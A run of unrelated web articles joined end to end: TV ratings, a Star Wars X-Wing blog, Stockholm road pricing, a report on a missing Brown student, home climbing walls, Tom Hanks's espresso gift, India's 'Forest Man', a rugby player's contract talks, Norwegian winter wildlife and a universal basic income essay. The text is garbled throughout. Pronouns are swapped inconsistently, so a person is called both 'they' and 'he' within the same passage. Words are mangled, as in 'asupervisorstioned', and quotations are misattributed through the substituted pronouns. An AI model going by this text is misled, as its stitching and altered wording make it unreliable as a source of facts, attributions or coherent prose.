#18 - LIFE IN PIECES-R (5.2m)
#19 - HAWAII FIVE-0-R (5.0m)
CBS Weekly Highlights:
BIG BROTHER WEDNESDAY (P) was the night's #1 program in viewers (6.19m), adults 25-54 (2.3) and adults 18-49 (1.9), winning every half-hour in these measures.
BIG BROTHER THURSDAY (P) was first in viewers (5.67m), adults 25-54 (2.1) and adults 18-49 (1.7).
BIG BROTHER SUNDAY (P) was tied for first in both adults 18-49 (1.6) and adults 18-34 (1.0) and second in viewers (5.45m) and adults 25-54 (2.0).
Photo: Michael Yarish/CBS
Related Articles
Fear is the path to the dark side. Fear leads to anger. Anger leads to hate. Hate leads to suffering. – Yoda
For the longest time, X-Wing has been the game I've played so that I could just play a game. It wasn't about playing competitively, or analyzing each decision, each point, each weakness and strength of my squad and my opponents. It was just about playing a game and having a blast. I've always thought this was the funnest game I've ever played. I have been afraid that by playing competitively I'd lose the casual side of the game.
It was at Worlds 2014 where my fear finally broke. I saw hundreds of X-Wing players having the time of their life and realized that my fear of losing the casual side of the experience was costing me an equally good and likely better experience. Last night, I took my first step into a much larger world… one filled with tiny ships, lots of dice, and some of the worlds best people. Of course, I'm talking about the competitive side of Star Wars X-Wing. My decision didn't come alone thankfully, as my brother Tim and I mutually decided to play X-Wing competitively this year. With that I put together my first test squad (with some help from Theorist) and sat down across the table from Tim.
The difference was immediately apparent. I was in a ‘competitive' mindset. For me this is soaking information in, analyzing everything, and making choices to test to see what happens. Where before I was just picking what at first glance was the best maneuver, now I was trying to gain as much information out of each decision as possible. In my years of playing X-Wing, this was the most excited I've ever been about X-Wing!
I've played X-Wing since the beginning, even before the beginning. If you're looking for something hilarious to do or maybe you don't believe me, Steven and I unbox Wave 1 here at the GenCon it was pre-released. We hadn't slept the night before due to traveling issues on the way to GenCon, but we had picked up a starter and the first wave at GenCon and were too excited to wait!
I would consider myself a decent X-Wing player. I'm a long time competitive gamer, so there are a lot of skills that carry over from one game to another. Being competitive at any game requires the ability to be good as a player, but it also requires knowing what your opponent is capable of and how best to play against what they bring to the table with your squad. There is a level of being comfortable that you gain from experience and this is something I'm not even close to achieving.
My intent with blogs posted here about X-Wing is to detail my experience getting familiar with this game and to get feedback from this stellar community. Without further ado, my first report!
The Swarm and the Decimator
It's important to note that I'm a huge fan of Darth Vader and Soontir Fel, both as game pieces and in the Star Wars universe. I was talking with Theorist and they gave me ideas on lists that I could run that would feature Darth Vader (as a pilot or crew) and/or Soontir Fel. With one of the possible lists including the Vader crew and Soontir, I felt I had no way to resist. Here is the list I played last night.
Commander Kenkirk (62)
Lone Wolf
Gunner
Ysanne
Darth Vader
Engine
Soontir (37)
Push the Limit
Shield Upgrade
Stealth Device
The idea is to use the Vader crew to activate Kenkirk and Ysanne early while dealing out some critical damage. Ideally you focus on important ships, like a Phantom or Howlrunner. At that point, Kenkirk is getting a free evade, rolling an evaded die, and able to re-roll thanks to Lone Wolf. He's a juicy target, so by the time they take them out you're hoping it's a full health Soontir against one or two ships. Outside a full health Phantom, Soontir can usually win that match.
When deciding to really dive into competitive X-Wing, one thing we knew is that we'd need to build and get familiar with the ‘popular' lists in the game. Tim happily volunteered to put together and learn how to fly a TIE Swarm. So, my first match was playing a two ship list against a seven ship, traditional swarm…
I learned a tremendous amount in this game, particularly that Tim doesn't know how to fly seven ships in unison across a board and that sending a Decimator head first into a swarm is a big, big mistake! Once Tim had to turn, they were bumping and flying all over the rocks. I think they took four damage in one turn thanks to asteroids! My respect for a good swarm player definitely went up after this game.
I also played the game completely wrong. Starting with positioning and ending with Vader triggering on the wrong ships at the wrong time. I sent the Decimator straight at the swarm and just got out gunned. The Decimator went down pretty quickly, leaving Soontir against a full Swarm. It was only a matter of time before they were on me, clogging my lanes, and denying me actions. Then it was lights out.
I'm not ready to give up on this list, or something similar, just yet because I played it that bad. However, I do think in the particular matchup against the Swarm, it is going to struggle. I can't really let either ship go 1 on 1 with a Swarm, so they have to stay together. This makes Lone Wolf a non-issue, which was a big concern of mine when considering positioning. The greatest lesson here is likely that you shouldn't let something you spent two points on determine how you play a game!
I'm more excited than ever for X-Wing and will be playing again tonight with this list and another with more ships. I have a slew of lists and ships I'm wanting to try, but at this point I'm also looking for lists to try! If you have an Imperial list you'd recommend, I'd love for you to leave it in the comments below with some basic tips on how to use it. I'll report back after more games! Until then, may the Force be with you.
Zach
Jonas Eliasson, a co-designer of Stockholm's famous congestion pricing system, recently gave a TEDx talk called "How to Solve Traffic Jams" (via The Transportationist). It's one of the clearest and most persuasive discussions of road pricing I've ever heard, and with the video nearing 300,000 viewers, I doubt I'm alone. I've summarized the talk here, but if you've got ten minutes to spare I highly recommend the whole thing.
Too often traffic planners try to determine what people should do instead of driving during rush hour, says Eliasson. They would prefer that cities provide the right incentives and let people take it from there. "You don't plan the details—people will figure out what to do, how to adapt to this new framework," they say.
So what are the right incentives? The answer, in the case of Stockholm, turned out to be just a couple euros per driver. That small fee removed 20 percent of rush-hour cars, says Eliasson, which may not sound like a ton but makes a very noticeable difference. The image behind Eliasson to the left is Stockholm on January 2, 2006, the day before the charges took place; the image to the right is January 3:
What's so fascinating about Stockholm's road pricing is how consistent the city's traffic reductions have been over the course of the program. The one exception was during a period between August 1, 2006, when the original trial ended, and August 2007, when a successful referendum brought pricing back. Traffic during that period neared its pre-pricing levels, and the increase in congestion was immediate. Here's another before and after view from 2006:
"You even have to admire the car drivers," says Eliasson. "They adapt so extremely quickly."
The Department of Public Safety and the Providence Police Department are continuing to search for a former undergraduate student who disappeared Saturday morning.
Sunil Tripathi, former member of the class of 2012, was discovered missing Sunday morning when a friend of Tripathi's found a note suggestive of suicidal intent with their belongings in their apartment, said Tripathi's sister Sangeeta Tripathi '04.
The friend immediately called Tripathi's family and the police, they added.
Tripathi was last seen in their 204 Angell St. residence Saturday morning around 11 a.m., Sangeeta Tripathi said. Earlier reports said Tripathi had last been seen Friday night.
Tripathi has brown eyes and short brown hair. They weigh 130 pounds and is 6 feet 2 inches tall, and they were wearing blue jeans, a Philadelphia Eagles beanie and a black sweatshirt.
DPS and Providence Police officers arrived at the residence early Sunday afternoon to launch an investigation, notifying hospitals in the area and police departments in nearby municipalities of the disappearance, said Detective Sergeant Bernard Gannon of the Providence Police Department.
Providence police officers have begun conducting a “pretty extensive” search spanning “mostly the East Side area,” Gannon said. Officers are searching by boat and “with manned teams on the waterfront areas,” Sangeeta Tripathi said.
“They're doing some very active work in some common places where people may go,” they said. In addition to searching waterways, police officers have searched India Point Park, Blackstone Boulevard and Roger Williams Park.
The Providence Police Department has taken the lead in the investigation, wrote Vice President for Public Affairs and University Relations Marisa Quinn in an email to The Herald. The University is providing “the full cooperation of Brown police officers and University staff,” they wrote.
Tripathi's parents, Judy and Akhil Tripathi, sister, Sangeeta, and brother, Ravi Tripathi '09, have been coordinating with Providence officers since they arrived in Providence Sunday night. They met with the missing persons unit Monday, Gannon said.
Since their disappearance, family and police have looked at Tripathi's computer “trying to piece together the story of what happened before they left,” Sangeeta Tripathi said.
“There was very little information,” they said. Police have conducted a “pretty large blanket search” that has not turned up any meaningful leads, they added.
“It's just a very scary time for all of us,” Sangeeta Tripathi '04 said. “I'm just praying, and people are kind of out of ideas.”
Family members posted flyers Monday in places Tripathi frequented, including Thayer Street, Wayland Square and Kennedy Plaza, Sangeeta Tripathi said. All patrol units have been given copies of the flyer and are looking for Tripathi, Gannon said. Police have also distributed their photograph to local television news outlets, they said.
The family appeared on local news outlet NBC 10 Monday night to raise awareness of Tripathi's disappearance, Gannon said.
Members of both sides of Tripathi's extended family are also in town or arriving this week “to help be an extra set of eyes and ears,” Sangeeta Tripathi said.
Tripathi's housemates are shaken by their disappearance and said they are concerned and hope they return safely.
A former philosophy concentrator, Tripathi played saxophone with the wind ensemble and in a saxophone quartet before taking a leave after the spring of their junior year in 2011, Sangeeta Tripathi said.
Tripathi was “struggling with depression,” they said. After taking leave, “he'd been living in Providence and taking time off to help get back on track and feel better about school and feel better about themselves and their health and life,” they added.
Family and a close group of friends were “very involved” in helping Tripathi through that struggle, they said.
Though Tripathi had a history of depression, their sister described the disappearance as “very atypical.”
“There was never ever any history of self-harm or escalation or a rash act at all,” they said. “He had a good day the day before (he disappeared), so we're all just worried and sad and scared and just really hoping he's safe.”
They described their brother as “the most shy, considerate, gentle young man.”
“Everyone who's known them or worked with them or taken classes with them noticed this very sweet, shy guy,” they said. “We want them to be safe.”
The Office of Student Life contacted Tripathi's family, Quinn wrote. “Our concerns are first and foremost with Sunil and their family,” they added.
The family spoke with University Chaplain Janet Cooper Nelson and hopes the administration will send out a campus-wide message with a photo of Tripathi to alert students to their disappearance and offer counseling support to those who may be distressed, Sangeeta Tripathi said. Members of the community can access counseling in the Office of Student Life by calling 401-863-3145, Quinn wrote.
“We will follow the lead (of) law enforcement on the best course of action to inform and solicit input from the community,” they wrote.
Tripathi's family is urging anyone with information regarding their disappearance to contact the Providence Police at 401-641-8691 or the Department of Public Safety at 401-863-3322.
A previous version of this article quoted Sangeeta Tripathi '04 describing their brother Sunil Tripathi as “really struggling with depression.” Though Tripathi struggled with depression, their depression was not extreme.
Belinda at Fast Company says "Few things say filthy rich more succinctly than an indoor rock-climbing wall." I had no idea; I am certainly not filthy rich, but I have an indoor rock-climbing wall. More precisely, I have a climbing cave, where instead of going vertical, you go horizontal, up the walls and across the ceiling. I have never made it across the room, but my lithe former climbing instructor son can do it easily.
It's in the attic of our house, and is in fact a free-standing structure within the room, not even attached to the ceiling; It is essentially an arch, with the outward thrust restrained by the existing knee walls. The panels are nothing more than 3/4" plywood with a grid of holes drilled and T-nuts stuck in from behind. Easy, really. I think it is a lovely thing, but the rest of the family thinks it ugly and wants it gone, now that my son has moved on. They don't realize what a hot architectural fashion accessory climbing walls have become. This is a great thing; we do go on about how exercise is so important, any activity that gets you and the kids away from the couch has got to be good. The best climbers are thin, light and reedy, and girls rule; it is a terrific thing to have in the house.
© Christof Schindler © Christof Schindler
Swiss designer Christoph Schindler made their plywood much prettier by running it through a computer controlled plunge router. They printed a pattern of drill holes that created an image of Fitz Roy in Patagonia, but other than that, it is pretty much the same as my wall, a grid of holes.
The plywood is turned and the T-nuts are fixed with a hammer... we have a total of 97 holes and started with a set of 15 climbing holds. The position of the holds can be altered any time and there are enough T-nuts to get more holds or fix other gear like a rope.
They built it as a present for their son, as did I; a 4x8 sheet of plywood can actually entertain for hours. They used a CNC machine; I used a chalk line, a measuring tape and a drill, and doubt it took much longer. I asked former climbing instructor Hugh for their opinion:
That climbing rope is dangerous and should be removed; the kid could get their leg, or worse, tangled in it. Rope courses and climbing walls don't mix.
More at Core77: Making a Mountain Out of a Piece of Plywood
In Japan, Naf Architect & Design have built this superficially lovely climbing wall, 7 meters high, up the middle of a house; Dezeen suggests that it "has a climbing wall and ladders, in case the owners get bored of using the stairs."
I have real problems with this. They show a climber well above the floor without a safety harness and a sloping skylight window below. They have stuck bolts in every T-nut on the wall to make it look prettier, but that also ensure that you are scraped and bloody if you ever drag across them. I don't know what they were thinking, other than it would create nice shadows in the architectural photos. Hugh's comments:
The rule is, any climb over 1.5 times your height can result in spinal injuries, that climber should be belayed. Look at the top photo, they are right on top of a door closer! It is not a climbable wall; there is no way through that throat between floors with glass on two sides. Are they going to do an eight food dyno over that door? And then there is that sharp window frame on the right in the lower photo. I would be leery about climbing this at all.
[a dyno is "A dynamic move to grab a hold that would otherwise be out of reach. Generally both feet will leave the rock face and return again once the target hold is caught. Non-climbers would call it a jump or a leap."]
It doesn't have to be so crazy. In a warehouse conversion in Osaka for climbing enthusiasts, Tato Architects put in a sloping wall where the owners could practice. Note that it isn't that high, and there is a bouldering mat to fall into. That's a real climber. More images in Dezeen. Hugh:
Too bad about the concrete floor.
At a whole different level is this "personal climbing wall that redefines training at home, making it a celebrated activity through a new take on design expression and a compelling interactive interface" from Lunar Europe in Munich
Normally, if you want to change your challenges, you have to move all the holds manually or stick tape all over. Not with Nova; you just get out your iPhone and program your route, and appropriate lights lay it out. That's clever and elegant; Chris at Gizmag calls it " a near seamless merger of art and sport."
The NOVA wall consists of panels with pattern-cut-outs, which replace the colored holds usually found on regular training walls. To offer a variety of climbing routes and difficulty levels, routes are indicated through light. NOVA shifts the paradigm of training at home, making it a celebrated activity.
I wish there was a little more variety in the type of hand hold, they are pretty much all similar crevasses. But it is a thing of beauty. More at Lunar Europe, found on Discovery News.
NOVA - Boulder trainer from LUNAR Europe on Vimeo.
Commenters at Fast Company have complained that it will not look so pretty when covered with chalk. I should point out that if there is one problem with climbing walls in your home, it is that you should not use chalk; it is not something that belongs in a healthy home. As wise geek noted:
Chalk dust can and does accumulate in the human respiratory system, which means it can create long-term health problems due to overexposure. In short, swallowing a piece of white chalkboard chalk won't kill you, but breathing in chalk dust for a number of years can create or trigger respiratory problems.
Hugh:
There is no way to climb this without chalk. You can't climb this without finger-jamming.
This article is over 1 year old
Coffee machine includes cartoon and note from actor to reporters covering the Trump administration
Tom Hanks has delivered an espresso machine to the White House press corps to provide a caffeinated boost to their efforts in the “good fight for truth”.
The gesture continues a long-running tradition by Hanks, who first bestowed a new coffee machine for the journalists covering the White House in 2004, during George W. Bush's presidency.
This time, the machine was accompanied by a note, typed on one of Hank's beloved typewriters, which read: “To The White House Press Corps, Keep up the good fight for Truth, Justice and the American way. Especially for the Truth part.”
Peter Alexander (@PeterAlexander) BREAKING: White House press corps receives brand-new espresso machine from @tomhanks. Come for the coffee... stay for their note. 👇 pic.twitter.com/cirbLKHEt0
The note also included a cartoon drawing of American soldiers, captioned: “Fresh, spirited American troops, flushed with victory, are bringing in thousands of hungry, ragged, battle-weary prisoners.”
Donald Trump's administration has had a fraught relationship with media in its short lifespan. Last week, the White House prevented reporters from outlets including the Guardian, the New York Times, and CNN from attending an off-camera press briefing with press secretary Sean Spicer.
Hanks, who publicly endorsed Hillary Clinton, has previously referred to Trump as “a self-involved gasbag” but said recently that “America has been in worse places” and was still “the greatest country in the world”.
The coffee machine replaces one that Hanks bought in 2010, after they noticed that the “poor slobs of the fourth estate” had left their original gift from 2004 in a sorry state from overuse.
“You know, you are supposed to clean this after every use,” they reportedly told the journalists.
The note is also a nod to Hanks's lifelong fascination with typewriters, which they collect. Their passion for the machines is the subject of their debut book, Uncommon Type, to be released in October, a collection of stories set around typewriters.
They once said of the machines that “each one stamps into paper a permanent trail of imagination through keys, hammers, cloth and dye – a softer version of chiselling words into stone”.
An Assamese who created a woodland in a river island is the Forest Man of India
It was the scorching summer of 1978 when Jadav Payeng, a Mishing tribal teenage boy, returned to their birthplace at Aruna sapori, a river island on the Brahmaputra.
They had just completed their Class X exams from Baligaon Jagannath Baruah Arya Vidyalaya in Jorhat and was about to loop strangely back into a different phase of their life. But no one could have predicted how different.
Jadav Payeng has created 1,360 acres of dense forest and is known as the 'Forest man of India' (Photos by Jitu Kalita)
On reaching, Payeng witnessed a sight that shook them to the core.
More than a hundred snakes curved, looped and twisted lifelessly on the deserted sandbar.
The boy's heart broke.
And from it burst forth a springtime without bounds.
Distressed and seeking counsel, the boy went to the nearby Deori community village. The snakes had been washed up to the sandbar by floods and had died without tree cover.
The villagers exhorted them to grow trees to save the reptiles. For where there are trees, there are birds, and where there are birds, there will be birds' eggs and fledglings - food for snakes and their ilk. Along with their native wisdom, the villagers offered the boy 50 seeds and 25 bamboo plants.
The young lad, just 15 or 16, set out all alone in April 1979 to plant life on the tough terrain of the eroded island covered with sand and silt. They sowed the seeds and shoots.
Thirty-six years later, they have reaped a forest.
Like all truly great people, Payeng, now in their mid-fifties, hailed the ‘Forest Man of India,' planter of a jungle, resuscitator of the earth, lone green warrior, is innocent of their feat.
“I never thought that my small initiative would make such a difference one day,” they say.
After all, Payeng, third among 13 siblings, which included seven sisters, started small and poor. Their father Lakhiram and mother Aphuli Payeng sold milk for a meagre living.
The 1965 deluge wrecked Aruna sapori and forced Payeng's family, among others, to move 12 kilometres away to Majuli on the other side of river. But that was not the only parting.
Before relocating, acute poverty compelled their parents to leave five-year-old Jadav in the care of Anil Borthakur, a court-master at the District Judge Court in Jorhat, who looked after their schooling.
After Class X, Payeng gave up school to look after the livestock left by their deceased parents. They still have a hundred cows and buffaloes and makes their living from selling milk. But they are no ordinary cattle owner.
They can lay claim to 1,360 acres of dense, defiant forest.
Payeng's forest is now home for five Royal Bengal tigers, over a hundred deer, wild boar, more than a hundred vultures, and several species of birds
From desolation sprouted inspiration, which swelled into an obsession. Payeng's zeal to revive the land knew no fences.
In the fertile period between April and June, they planted the forest. They rattle off the species, like names from an intimate family tree: bamboos, baheda, teak; gambhari; custard apple, star fruit, gulmohur; devil's tree, tamarind, mulberry; mango, jackfruit, plum, peach, banyan; elephant grass and medicinal plants… the list is varied and exhaustive.
The rest of the year, they collected seeds and saplings. “I covered a distance of a kilometre in five years,” Payeng recalls, “and in stages it got covered with dense vegetation dominated by trees.” Local inhabitants nicknamed them ‘Molai' meaning ‘forest' and dubbed their woodland ‘Molai Forest'.
At the age of 39, on the insistence of village elders, Payeng married 25-year-old Binita and they have three school-going children - daughter Munmuni, 16, and two boys Sanjiv, 14, and Sanjay, 13. It was for their schooling that Payeng moved with their family to Eklong Mising Gaon, Kokilamukh, Jorhat, in 2011.
This meant that now their day breaks even before dawn, at 3 am, and a localised steeplechase begins.
Payeng makes daily trips to their forest and is planning to stretch its boundaries
They cycle an hour to Kartik sapori, then rows their boat for about five kilometres, and then cycles again for half an hour across grassy meadows to reach their cow-shed to clean out the dung, milk the cattle, and spread cattle-manure to fertilize the fields. Milk dispatched for sale, a quick breakfast behind them at 9, and they are ready to walk into their jungle, their karmabhumi.
The forest that Payeng grew now houses five Royal Bengal tigers, over a hundred deer, wild boar, more than a hundred vultures, several species of birds, including pelicans, three or four greater one-horned rhinoceroses, besides of course, the snakes, who were at the genesis of this extraordinary story.
A herd of 115 elephants visits regularly for 3-4 months. “In 35 years, the Royal Bengal tigers have feasted on 85 of my cows, 95 buffaloes and 10 pigs,” Payeng says matter-of-factly, then adds jokingly, “They (the tigers) do not know farming, you see.”
Payeng with their friend and mentor Jitu Kalita
Surrounded by their beloved trees, Payeng may well have remained in their shadow had it not been for Jitu Kalita, a local wildlife photographer, who published an article on them in a vernacular daily in 2010. Today, Jitu is Jadav's friend and mentor.
The local administration has been neither of those. Hell, this forester without designation does not even own a ration card.
Payeng laments the indifference of the forest department, saying that they neither helped them grow the forest nor paid heed when they informed them of the endangered rhinos regularly visiting their forest.
They believed them only when a rhino was poached on in August 2012. “My younger son and I couldn't eat for a couple of days when we saw its horn, tail and nails gouged out,” Payeng grieves.
Payeng with daughter Munmuni, the first of their three children, all of whom share their love for nature
“It is a huge forest and cannot be protected by a handful of staff.” In any case, Payeng believes that law enforcement alone cannot help protect vulnerable species. Their sage advice is to form ‘community reserves' and organise awareness camps to guard against poachers and conserve wildlife.
For their remarkable solo undertaking, the Jawaharlal Nehru University invited Payeng on Earth Day and honoured them with the title of the ‘Forest Man of India' in 2012.
Later that year, the then President APJ Abdul Kalam felicitated them with a cash award in Mumbai. The same year, they were among the 900 experts who gathered at the seventh global conference of the International Forum for Sustainable Development at Evian in France. Sanctuary Asia bestowed on them the Wildlife Service Award. This year, they received the Padma Shri.
However, prizes matter little to this man for whom a whole crowded forest stands up in ovation.
“The Padma Shri is an award for encouragement,” they say, “but my aim has always been to do good for the country. Even the President of India has to do something for the earth; otherwise, there will be nobody left, nothing.'
This nature-lover strongly recommends making Environmental Sciences a mandatory subject, to start them young – just as they did. “If every schoolchild is given the responsibility to grow two trees, it will surely lead to a Green India,” Payeng urges.
Expectedly, they spend all the cash awards on more forest. They have now recruited four labourers for planting as they eye another 5,000-acre area.
“The forest could stretch till Majuli,” they envision, “further to Kamalabari and up to Dibrugarh district.”
Next year, Payeng plans to grow trees in some dammed areas in Rajasthan with their soul-brother Rajendra Singh, the ‘Waterman of India'.
All their waking hours, Payeng sees the world in green. Come sunset, they wend their way back home on bicycle-boat-bicycle for their 8-pm meal. A little after-dinner apong to smoothen the day's furrows, and it's time for bed.
Tomorrow is another day, and in it lie the seeds of many more forests.
COREY Parker headed into contract negotiations having just had the best season of their life.
It was the end of 2013 and they had just claimed the Paul Morgan Medal for the Broncos' best and fairest, as well as the Dally M Lock of the Year and the International Lock of the Year.
Then 31, the Maroons star felt it was their turn to cash in for what had already been a fantastic career. They wanted a three year deal on good money.
But their expectations couldn't have been further from the Broncos' offer.
“You know what I ended up with? Just over $200,000 a season,” Parker writes in their newly released autobiography, Iron Man.
“It was kind of hard to cop when Penrith had just signed Jamie Soward on a four-year deal allegedly worth $3.6 million.
“Nothing against Jamie and good luck to them if the numbers were right but they hadn't played for New South Wales since 2011 and had never played for their country.
“Will Hopoate signed a two-year deal allegedly worth $2.3 million with Parramatta and they hadn't played for two years after going on a Mormon mission.
Anthony Griffin and Corey Parker had it out over the Broncos star's last contract. Source: News Limited
“Even Ben Barba was coming to our club and reports had them being paid well over $1 million over three years.
“Surely I was good enough at that stage of my career to be knocking on the door of the million-dollar club too.”
Those contract negotiations were difficult for Parker and they laid bare a couple of harsh truths about the NRL.
In an interview with foxsports.com.au they reveal the process taught them two things: 1. Elite forwards are undervalued; and 2. It's hard to get what you're worth when you represent yourself.
“I think we're starting to see it shift a little bit now, with some of the contracts that these younger forwards are getting,” Parker says.
“But that was just how it was perceived, you didn't pay forwards big money — for whatever reason, I don't know — but now it's starting to change a bit.
“Those days are gone for me, so it's just done my best now.”
Parker lists newly crowned Dally M Award winner Jason Taumalolo and Storm superstar Jesse Bromwich as two examples of forwards who are spoken about in the same breath as elite playmakers like Johnathan Thurston, Cameron Smith and Jarryd Hayne.
South Sydney's Clive Churchill Medallist Sam Burgess is also paid in the elite bracket and Parker says the shift reflects a change in what's required of forwards at the top level.
“I think particularly the way the game's changing, there's a need for hardworking, long playing minute forwards,” Parker said.
“It's a high priority now. What isn't undervalued is what that's worth to a team.
“But you're only as good as someone wants to pay you and if you're happy to sign that, regardless, well that's how it works.”
Melbourne football manager Frank Ponissi joins Nathan Ryan, Ben Glover and Ben Ikin to discuss the 2016 grand final, how their roster was built and how Billy Slater is holding up.
You can also subscribe via iTunes or for Android users, listen on the iPP Podcast Player app.
At that time Parker was representing themselves having parted company very early in their career with their only representative, Jim Banaghan.
Parker admits that they would have got more from their last contract had the negotiations been conducted by a manager but says there were other benefits to seeing how clubs worked behind the scenes.
“I've learnt a hell of a lot by doing that,” Parker says.
“Have I forgoed (sic) some money along the way? Yes, I have. Would I be the same person as I am today for not doing that? I don't know. So that's a tough one there.
“What I would say is that some of those conversations and dealings are really hard to do.
“Some people just don't feel at ease with doing that.
“ ... But the other thing for me was that subconsciously, deep down, I never really wanted to leave the Broncos.
“I didn't want to give myself, being truthful, a reason for leaving.
“If I was to approach a manager or go on the open market that might have meant that I would leave.
“Did the Broncos know or understand that way about me? They probably did. But I don't think I'd be the person I am if I hadn't experienced that myself.”
- Parts of this story are extracts from Iron Man by Corey Parker, RRP $34.99, Macmillan Australia, out now!
The writer is on Twitter @glover_benny
Download the new FOX SPORTS App to get the latest news and scores from your NRL team.
Norwegian mammals and birds have many different methods of surviving long, intense winter nights. A biologist from the Norwegian University of Science and Technology (NTNU) University Museum reveals their secrets for survival.
For birds and animals that must live out in Norway's frigid winters, every second has to be spent finding enough food not just to survive the day, but also the long hard night.
Not every creature manages to survive -- it is not uncommon to find frozen birds in birdhouses after a winter cold snap.
Some creatures solve this problem by being inactive. Bears sleep and hedgehogs, bats, and the northern birch mouse all hibernate between October and April or May. But not every critter has this possibility.
Snow as an insulator
Surviving the cold is most difficult for small creatures -- large mammals and birds can go up to several days without food.
Small creatures tend to have a large surface area compared to their total body size, which means that their bodies loose heat quickly when the cold sets in. They also aren't able to store as much fat, which means less insulation and more heat loss. Surviving is all about preventing this heat loss.
Norwegian game fowl, including wood grouse, black grouse, hazel grouse and willow ptarmigan, all choose to find shelter in snow caves or burrows at night, and when they rest during the day. Snow insulates very well, so these small caves are significantly warmer than if the birds were to sleep in the open.
Hazel grouse often spend their winter nights (and often days as well) in trees. During periods of intense cold, the birds dig down into the snow, where they stay to survive and protect themselves from the cold.
Small birds burrow too
The 13 cm long mealy redpoll uses the snow to stay alive through long winter nights as well. During intense cold, it digs a system of snow tunnels for shelter. If the snow is loose, it can just burrow straight down and make itself comfortable. If the snow is harder, it will dig down to between 6-11 cm below the surface, and then make a horizontal tunnel to spend the night in. In the morning, it emerges straight back up.
The Eurasian bullfinch also takes this approach. Snow insulates well, reducing the amount of heat lost by tiny bodies and minimizing the amount of energy spent surviving the night.
Small rodents such as voles and field mice also spend most of their winters in air pockets underneath the snow.
Sharing body heat is a lifesaver
One of Norway's smallest birds, the tiny Eurasian wren, often groups together under the snow to survive nights, huddling tightly in groups of two or more. As many as 60 birds have been found together in England, piled on top of each other in several layers.
Eurasian treecreepers also sleep tightly grouped together, often in cracks in bark or in tree trunks under large branches.
Huddling together is undoubtedly incredibly important to staying warm. However, in all of the asupervisorstioned cases, none of the birds seem to be particularly happy about the arrangement. There is often a lot of aggression within these groups, although cold does make the birds more docile. Surviving the night is most important. And you have to be thankful for what you've got.
Air pockets can be hard to find
To prevent heat loss through the course of the night, birds will try to find well insulated spots to sleep, such as an air pocket in the snow or a sheltered spot under a tree branch.
Woodpeckers peck out special holes to sleep in. These are not as well made as nesting holes, but do a good job of protecting the birds against the cold.
Many species of tits don't make their own nests, which leads to a shortage of good places to sleep. Because of this, you can sometimes see great tits fighting over the best sleeping spots at twilight.
Slowed metabolism
Certain species of tits survive cold winter nights by slowing their metabolism and reducing their internal body temperature.
During cold nights, willow tits can reduce their body temperature from the average 41 degrees to 31 degrees C, thereby drastically reducing damaging heat loss. The energy saved due to this can determine whether or not a bird survives. If a bird's temperature goes down any more, however, it will die.
Willow tits have a finely tuned thermostat that tells the bird to start shivering when its core temperature reaches 32 degrees C. The action of shivering produces heat that allows the bird to stabilize its core temperature.
Cold spells are trying for Norway's overwintering creatures. The long cold nights are the biggest challenges. And yet, they have survived, after thousands of years of finding different ways of adapting to this harsh environment.
Eduardo Porter's broadside against a universal basic income focuses almost entirely on the cost and efficiency of cutting every American a check that would keep them out of poverty. But the harder — and more important — question around a UBI is about how it interacts with our culture of work. And the truth is I have no idea how to answer it.
Here is the question: Could we respect people who live off a universal basic income?
Porter thinks not. Work, they write, "is not just what people do for a living. It is a source of status. It organizes people's lives. It offers an opportunity for progress. None of this can be replaced by a check."
Later, they say that "in this world ... where work remains an important social, psychological and economic anchor, there are better tools to help than giving every American a monthly check."
Notice what they did there. "In this world." So long as any discussion of a universal basic income is predicated on those three words, then I agree: It's a bad idea. But the whole argument over a UBI, as I see it, is about the legitimacy of those three words. A UBI is the kind of radical policy that asks whether we actually need to live in this world, or whether there are better worlds on offer, if only we have the political and cultural courage to find them.
Does work — as currently conceived — have to be our primary source of status? Should it organize our lives? And can those dynamics be changed by a check?
The retirement paradox
Human beings are almost endlessly adaptable. Studies show that even the worst tragedies — the loss of a family member, the loss of a limb — only temporarily cut their happiness. But there are some conditions we never quite get used to. Among them is an extended bout of unemployment.
"Compared with other negative experiences, the life satisfaction of the unemployed does not restore itself even after having been unemployed for a long time," write economists Clemens Hetschko, Andreas Knabe, and Ronnie Schöb.
One major theory is that the pain of unemployment comes from the loss of social status. "Worker" is an identity you can be proud of, even if you don't like your job. Having to recategorize yourself as "unemployed" robs you of your self-respect — and self-respect, it turns out, matters more than mere limbs.
Hetschko, Knabe, and Schöb test this in a clever way. Looking at a data set of German workers, they measured the happiness of unemployed workers when they retire. It is, they note, an interesting kind of transition — your day stays the same, but your idea of yourself doesn't. "Entering retirement brings about a change in the social category, but does not change anything else in the lives of the long-term unemployed." The unemployed person who retires still spends their day outside a workplace. But now they can call themselves a retiree — a perfectly honorable social designation — rather than unemployed.
The effect this has on happiness proves profound. A typical unemployed male sees their life satisfaction rise by 0.3 points on a scale from 0 to 10. If they were unemployed and still trying to find a new job, their life satisfaction rises by almost 0.7 points. In both cases, the effects persist for years.
These numbers might seem small, but remember: Persistent changes in life satisfaction are rare. Even huge events in a person's life rarely lead to long-term changes in happiness. Marriage, for instance, "causes a mere 0.2 point increase in average life satisfaction."
On the other side, if work really drives happiness, then the employed should experience retirement as a kind of trauma. But that's not true, either. Though moving from "worker" to "retiree" changes a person's life much more than moving from "unemployed" to "retired," it barely changes life satisfaction at all.
Can a check change our work culture?
Once you accept that the benefits of work flow in large part from the benefits of being able to call yourself employed, the dynamics of a universal basic income become much more complicated.
Porter's piece largely focuses on the economics of a UBI. But I think the cultural changes it would — or wouldn't — trigger are more important.
Take Pete. He's a 30-something ex–software engineer who has been unemployed for years. They scrape by on basically no money: biking everywhere, never buying coffee, never eating out, making their own home repairs. They eke out a bit of extra income making furniture for friends, but it's nothing near a viable business. Poor guy.
Now look at Mr. Money Mustache. He's a 30-something software engineer who has been retired for years. They write a wildly popular blog where they tell people how to retire early and live on basically no money: bike everywhere, make your own coffee, stop eating out, figure out how to fix a toilet. They have elevated frugality into a status competition — and they are winning it. Their followers call themselves Mustachians. They have been interviewed by every media outlet you can think of (including Vox). ABC News says they are "living the dream." Their motto? "Financial freedom through badassery." Helluva guy.
As you've probably already guessed, Pete is Mr. Money Mustache, and he's a good example of how much of the trauma of unemployment comes from the weight of society's disapproval, the shame that comes when a friend of a friend asks, "And what do you do?" Pete's answer is humiliating. Mr. Money Mustache's answer is, well, badass.
Saying, "I'm unemployed" is very different from saying, "I retired at 32, and it's amazing." The question is whether recipients of a UBI would have an answer more like Pete or more like Mr. Money Mustache.
The case for and against a UBI
